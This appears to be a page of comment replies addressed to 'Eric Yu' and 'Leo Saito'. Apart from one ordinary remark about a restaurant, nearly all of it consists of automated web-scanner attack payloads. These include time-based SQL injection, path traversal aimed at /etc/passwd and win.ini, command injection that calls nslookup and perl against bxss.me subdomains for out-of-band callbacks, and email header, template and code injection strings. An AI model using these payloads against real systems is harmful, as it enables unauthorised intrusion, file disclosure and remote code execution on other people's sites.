-5) OR 968=(SELECT 968 FROM PG_SLEEP(15))--
re: Eric Yu
-1)) OR 724=(SELECT 724 FROM PG_SLEEP(15))--
re: Eric Yu
a1z1UpGR' OR 93=(SELECT 93 FROM PG_SLEEP(15))--
re: Eric Yu
ikVWTKbQ') OR 992=(SELECT 992 FROM PG_SLEEP(15))--
re: Eric Yu
lkcP20Yk')) OR 252=(SELECT 252 FROM PG_SLEEP(15))--
re: Eric Yu
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Eric Yu
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Eric Yu
'||(select 1 from (select pg_sleep(15))x)||'
re: Eric Yu
''||(select 1 from (select pg_sleep(15))x)||''
re: Eric Yu
1'"
re: Eric Yu
@@EGgVh
re: Eric Yu
1gkdmma4O
re: Eric Yu
%0abcc:074625.67-10230.67.c5753.19990.2@bxss.me
re: Eric Yu
response.write(9117049*9393886)
re: Eric Yu
to@example.com>%0d%0abcc:074625.67-10231.67.c5753.19990.2@bxss.me
re: Eric Yu
'+response.write(9117049*9393886)+'
re: Eric Yu
<esi:include src="http://bxss.me/rpb.png"/>
re: Eric Yu
"+response.write(9117049*9393886)+"
re: Eric Yu
${10000189+9999268}
re: Eric Yu
../../../../../../../../../../../../../../etc/passwd
re: Eric Yu
../../../../../../../../../../../../../../windows/win.ini
re: Eric Yu
file:///etc/passwd
re: Eric Yu
../../../../../../../../../../../../../../../proc/version
re: Eric Yu
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: Eric Yu
'.gethostbyname(lc('hitms'.'lvnugyxq094cc.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(106).chr(83).chr(99).chr(81).'
re: Eric Yu
)
re: Eric Yu
../../../../../../../../../../etc/passwd%00.jpg
re: Eric Yu
".gethostbyname(lc("hitxj"."bsjqlyyk6166d.bxss.me."))."A".chr(67).chr(hex("58")).chr(107).chr(84).chr(117).chr(76)."
re: Eric Yu
!(()&&!|*|*|
re: Eric Yu
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: Eric Yu
^(#$!@#$)(()))******
re: Eric Yu
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: Eric Yu
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: Eric Yu
/etc/passwd
re: Eric Yu
echo whyswa$()\ oimayz\nz^xyu||a #' &echo whyswa$()\ oimayz\nz^xyu||a #|" &echo whyswa$()\ oimayz\nz^xyu||a #
re: Eric Yu
%2fetc%2fpasswd
re: Eric Yu
&echo grmdxr$()\ esryrr\nz^xyu||a #' &echo grmdxr$()\ esryrr\nz^xyu||a #|" &echo grmdxr$()\ esryrr\nz^xyu||a #
re: Eric Yu
/.././.././.././.././.././.././.././../etc/./passwd%00
re: Eric Yu
HttP://bxss.me/t/xss.html?%00
re: Eric Yu
|echo dvcjhm$()\ wiuywy\nz^xyu||a #' |echo dvcjhm$()\ wiuywy\nz^xyu||a #|" |echo dvcjhm$()\ wiuywy\nz^xyu||a #
re: Eric Yu
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: Eric Yu
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: Eric Yu
"+"A".concat(70-3).concat(22*4).concat(113).concat(79).concat(117).concat(73)+(require"socket"
Socket.gethostbyname("hitwu"+"edpnavmbb33af.bxss.me.")[3].to_s)+"
re: Eric Yu
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Eric Yu
bxss.me/t/xss.html?%00
re: Eric Yu
(nslookup hitjplmunqctr1e610.bxss.me||perl -e "gethostbyname('hitjplmunqctr1e610.bxss.me')")
re: Eric Yu
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: Eric Yu
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: Eric Yu
'+'A'.concat(70-3).concat(22*4).concat(98).concat(79).concat(106).concat(76)+(require'socket'
Socket.gethostbyname('hitbv'+'hgxnwewd0c7bf.bxss.me.')[3].to_s)+'
re: Eric Yu
';print(md5(31337));$a='
re: Eric Yu
$(nslookup hitfzdnyjjbtv4b757.bxss.me||perl -e "gethostbyname('hitfzdnyjjbtv4b757.bxss.me')")
re: Eric Yu
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: Eric Yu
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: Eric Yu
Http://bxss.me/t/fit.txt
re: Eric Yu
";print(md5(31337));$a="
re: Eric Yu
&nslookup hituamzfzkhtce1181.bxss.me&'\"`0&nslookup hituamzfzkhtce1181.bxss.me&`'
re: Eric Yu
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: Eric Yu
http://bxss.me/t/fit.txt%3F.jpg
re: Eric Yu
${@print(md5(31337))}
re: Eric Yu
&(nslookup hitszlmvpklynab5cf.bxss.me||perl -e "gethostbyname('hitszlmvpklynab5cf.bxss.me')")&'\"`0&(nslookup hitszlmvpklynab5cf.bxss.me||perl -e "gethostbyname('hitszlmvpklynab5cf.bxss.me')")&`'
re: Eric Yu
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: Eric Yu
/etc/shells
re: Eric Yu
${@print(md5(31337))}\
re: Eric Yu
|(nslookup hituaallttkcq5ba0f.bxss.me||perl -e "gethostbyname('hituaallttkcq5ba0f.bxss.me')")
re: Eric Yu
file:///etc/passwd
re: Eric Yu
c:/windows/win.ini
re: Eric Yu
'.print(md5(31337)).'
re: Eric Yu
'"
re: Eric Yu
`(nslookup hituqicltfvfr4fba4.bxss.me||perl -e "gethostbyname('hituqicltfvfr4fba4.bxss.me')")`
re: Eric Yu
/\../\../\../\../\../\../\../etc/passwd
re: Eric Yu
bxss.me
re: Eric Yu
<!--
re: Eric Yu
;(nslookup hitucccztdrbc250ea.bxss.me||perl -e "gethostbyname('hitucccztdrbc250ea.bxss.me')")|(nslookup hitucccztdrbc250ea.bxss.me||perl -e "gethostbyname('hitucccztdrbc250ea.bxss.me')")&(nslookup hitucccztdrbc250ea.bxss.me||perl -e "gethostbyname('hitucccztdrbc250ea.bxss.me')")
re: Eric Yu
/WEB-INF/web.xml
re: Eric Yu
C:\WINDOWS\system32\drivers\etc\hosts
re: Eric Yu
../../../../../../../../../../windows/win.ini%00.jpg
re: Eric Yu
/../../../../../../../../../../boot.ini
re: Eric Yu
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: Eric Yu
..\..\..\..\..\..\..\..\windows\win.ini
re: Eric Yu
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: Eric Yu
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: Eric Yu
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: Eric Yu
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: Eric Yu
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: Eric Yu
WEB-INF/web.xml
re: Eric Yu
WEB-INF\web.xml
re: Eric Yu
1
re: Eric Yu
1
re: Eric Yu
-1 OR 2+127-127-1=0+0+0+1 --
re: Eric Yu
-1 OR 3+127-127-1=0+0+0+1 --
re: Eric Yu
-1 OR 2+204-204-1=0+0+0+1
re: Eric Yu
-1 OR 3+204-204-1=0+0+0+1
re: Eric Yu
-1' OR 2+821-821-1=0+0+0+1 --
re: Eric Yu
-1' OR 3+821-821-1=0+0+0+1 --
re: Eric Yu
-1' OR 2+748-748-1=0+0+0+1 or 'lCDIje9g'='
re: Eric Yu
-1' OR 3+748-748-1=0+0+0+1 or 'lCDIje9g'='
re: Eric Yu
-1" OR 2+558-558-1=0+0+0+1 --
re: Eric Yu
-1" OR 3+558-558-1=0+0+0+1 --
re: Eric Yu
if(now()=sysdate(),sleep(15),0)
re: Eric Yu
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Eric Yu
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Eric Yu
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Eric Yu
-1; waitfor delay '0:0:15' --
re: Eric Yu
-1); waitfor delay '0:0:15' --
re: Eric Yu
1 waitfor delay '0:0:15' --
re: Eric Yu
WKeiLhvI'; waitfor delay '0:0:15' --
re: Eric Yu
-5 OR 655=(SELECT 655 FROM PG_SLEEP(15))--
re: Eric Yu
-5) OR 521=(SELECT 521 FROM PG_SLEEP(15))--
re: Eric Yu
-1)) OR 395=(SELECT 395 FROM PG_SLEEP(15))--
re: Eric Yu
rcA1Rkkz' OR 694=(SELECT 694 FROM PG_SLEEP(15))--
re: Eric Yu
6YAtn9JQ') OR 210=(SELECT 210 FROM PG_SLEEP(15))--
re: Eric Yu
69tZxb1f')) OR 644=(SELECT 644 FROM PG_SLEEP(15))--
re: Eric Yu
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Eric Yu
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Eric Yu
'||(select 1 from (select pg_sleep(15))x)||'
re: Eric Yu
''||(select 1 from (select pg_sleep(15))x)||''
re: Eric Yu
1'"
re: Eric Yu
@@kYert
re: Eric Yu
1
re: Eric Yu
1
re: Eric Yu
1
I forgot to list Bamboo since I haven't been there recently lol.
re: Leo Saito
vXqOwF8B
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
-1 OR 2+106-106-1=0+0+0+1
re: Leo Saito
-1 OR 3+106-106-1=0+0+0+1
re: Leo Saito
if(now()=sysdate(),sleep(15),0)
re: Leo Saito
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Leo Saito
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Leo Saito
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Leo Saito
-1; waitfor delay '0:0:15' --
re: Leo Saito
-1); waitfor delay '0:0:15' --
re: Leo Saito
1 waitfor delay '0:0:15' --
re: Leo Saito
rOMxuOkx'; waitfor delay '0:0:15' --
re: Leo Saito
-5 OR 174=(SELECT 174 FROM PG_SLEEP(15))--
re: Leo Saito
-5) OR 666=(SELECT 666 FROM PG_SLEEP(15))--
re: Leo Saito
-1)) OR 616=(SELECT 616 FROM PG_SLEEP(15))--
re: Leo Saito
loIVZAaE' OR 313=(SELECT 313 FROM PG_SLEEP(15))--
re: Leo Saito
RqhPtZvU') OR 94=(SELECT 94 FROM PG_SLEEP(15))--
re: Leo Saito
WNPdGVsf')) OR 287=(SELECT 287 FROM PG_SLEEP(15))--
re: Leo Saito
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Leo Saito
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Leo Saito
'||(select 1 from (select pg_sleep(15))x)||'
re: Leo Saito
''||(select 1 from (select pg_sleep(15))x)||''
re: Leo Saito
1'"
re: Leo Saito
@@JPH4c
re: Leo Saito
w4hJiNqS
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
-1 OR 2+710-710-1=0+0+0+1
re: Leo Saito
-1 OR 3+710-710-1=0+0+0+1
re: Leo Saito
if(now()=sysdate(),sleep(15),0)
re: Leo Saito
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Leo Saito
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Leo Saito
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Leo Saito
-1; waitfor delay '0:0:15' --
re: Leo Saito
-1); waitfor delay '0:0:15' --
re: Leo Saito
1 waitfor delay '0:0:15' --
re: Leo Saito
qNUdIF7Z'; waitfor delay '0:0:15' --
re: Leo Saito
-5 OR 119=(SELECT 119 FROM PG_SLEEP(15))--
re: Leo Saito
-5) OR 719=(SELECT 719 FROM PG_SLEEP(15))--
re: Leo Saito
-1)) OR 496=(SELECT 496 FROM PG_SLEEP(15))--
re: Leo Saito
4sTeaa6m' OR 916=(SELECT 916 FROM PG_SLEEP(15))--
re: Leo Saito
qaxLMorH') OR 469=(SELECT 469 FROM PG_SLEEP(15))--
re: Leo Saito
hntCIutP')) OR 749=(SELECT 749 FROM PG_SLEEP(15))--
re: Leo Saito
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Leo Saito
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Leo Saito
'||(select 1 from (select pg_sleep(15))x)||'
re: Leo Saito
''||(select 1 from (select pg_sleep(15))x)||''
re: Leo Saito
1'"
re: Leo Saito
@@LH2AC
re: Leo Saito
1vkAx8qVO
re: Leo Saito
response.write(9988753*9465089)
re: Leo Saito
'+response.write(9988753*9465089)+'
re: Leo Saito
"+response.write(9988753*9465089)+"
re: Leo Saito
%0abcc:074625.67-10216.67.8d207.19990.2@bxss.me
re: Leo Saito
to@example.com>%0d%0abcc:074625.67-10217.67.8d207.19990.2@bxss.me
re: Leo Saito
../../../../../../../../../../../../../../etc/passwd
re: Leo Saito
../../../../../../../../../../../../../../windows/win.ini
re: Leo Saito
file:///etc/passwd
re: Leo Saito
<esi:include src="http://bxss.me/rpb.png"/>
re: Leo Saito
../../../../../../../../../../../../../../../proc/version
re: Leo Saito
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: Leo Saito
../../../../../../../../../../etc/passwd%00.jpg
re: Leo Saito
${9999104+10000018}
re: Leo Saito
echo hpgcaz$()\ yashdm\nz^xyu||a #' &echo hpgcaz$()\ yashdm\nz^xyu||a #|" &echo hpgcaz$()\ yashdm\nz^xyu||a #
re: Leo Saito
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: Leo Saito
&echo gjzquu$()\ kbivgo\nz^xyu||a #' &echo gjzquu$()\ kbivgo\nz^xyu||a #|" &echo gjzquu$()\ kbivgo\nz^xyu||a #
re: Leo Saito
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: Leo Saito
|echo itzeiq$()\ blheyn\nz^xyu||a #' |echo itzeiq$()\ blheyn\nz^xyu||a #|" |echo itzeiq$()\ blheyn\nz^xyu||a #
re: Leo Saito
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: Leo Saito
(nslookup hitiasofiomrc0afc5.bxss.me||perl -e "gethostbyname('hitiasofiomrc0afc5.bxss.me')")
re: Leo Saito
/etc/passwd
re: Leo Saito
$(nslookup hitkpiqudhiqrf2376.bxss.me||perl -e "gethostbyname('hitkpiqudhiqrf2376.bxss.me')")
re: Leo Saito
%2fetc%2fpasswd
re: Leo Saito
&nslookup hitdzdbwrrdru5a251.bxss.me&'\"`0&nslookup hitdzdbwrrdru5a251.bxss.me&`'
re: Leo Saito
/.././.././.././.././.././.././.././../etc/./passwd%00
re: Leo Saito
&(nslookup hitacxnnrhjqk51dda.bxss.me||perl -e "gethostbyname('hitacxnnrhjqk51dda.bxss.me')")&'\"`0&(nslookup hitacxnnrhjqk51dda.bxss.me||perl -e "gethostbyname('hitacxnnrhjqk51dda.bxss.me')")&`'
re: Leo Saito
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: Leo Saito
)
re: Leo Saito
|(nslookup hitxjcssbdhlj8462d.bxss.me||perl -e "gethostbyname('hitxjcssbdhlj8462d.bxss.me')")
re: Leo Saito
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: Leo Saito
!(()&&!|*|*|
re: Leo Saito
`(nslookup hitbdaqfebknc6d2e8.bxss.me||perl -e "gethostbyname('hitbdaqfebknc6d2e8.bxss.me')")`
re: Leo Saito
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: Leo Saito
^(#$!@#$)(()))******
re: Leo Saito
;(nslookup hitecdeeppyds5ed2d.bxss.me||perl -e "gethostbyname('hitecdeeppyds5ed2d.bxss.me')")|(nslookup hitecdeeppyds5ed2d.bxss.me||perl -e "gethostbyname('hitecdeeppyds5ed2d.bxss.me')")&(nslookup hitecdeeppyds5ed2d.bxss.me||perl -e "gethostbyname('hitecdeeppyds5ed2d.bxss.me')")
re: Leo Saito
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: Leo Saito
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: Leo Saito
file:///etc/passwd
re: Leo Saito
/\../\../\../\../\../\../\../etc/passwd
re: Leo Saito
/WEB-INF/web.xml
re: Leo Saito
'.gethostbyname(lc('hitxb'.'ygtobdas567db.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(113).chr(81).chr(105).chr(90).'
re: Leo Saito
C:\WINDOWS\system32\drivers\etc\hosts
re: Leo Saito
